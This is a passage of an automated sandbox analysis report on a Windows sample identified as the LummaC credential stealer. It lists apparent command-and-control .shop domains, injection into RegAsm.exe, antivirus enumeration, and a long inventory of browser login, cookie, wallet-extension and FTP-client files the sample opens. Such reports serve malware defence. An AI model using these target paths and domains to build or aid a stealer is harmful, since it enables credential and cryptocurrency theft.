      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: contintnetksows.shop
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: foodypannyjsud.shop
      Source: mkFOY01Gl5.exe, 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: potterryisiw.shop
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 74F008Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F779C cpuid 0_2_000F779C
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_00106831
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_0010D83B
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_0010D886
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_0010D921
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0010D9AC
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: EnumSystemLocalesW,0_2_001062CB
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_0010DBFF
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0010DD28
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_0010D599
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_0010DE2E
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0010DEFD
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: GetLocaleInfoW,0_2_0010D794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\mkFOY01Gl5.exeCode function: 0_2_000F7BC3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000F7BC3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Tries to steal Crypto Currency Wallets
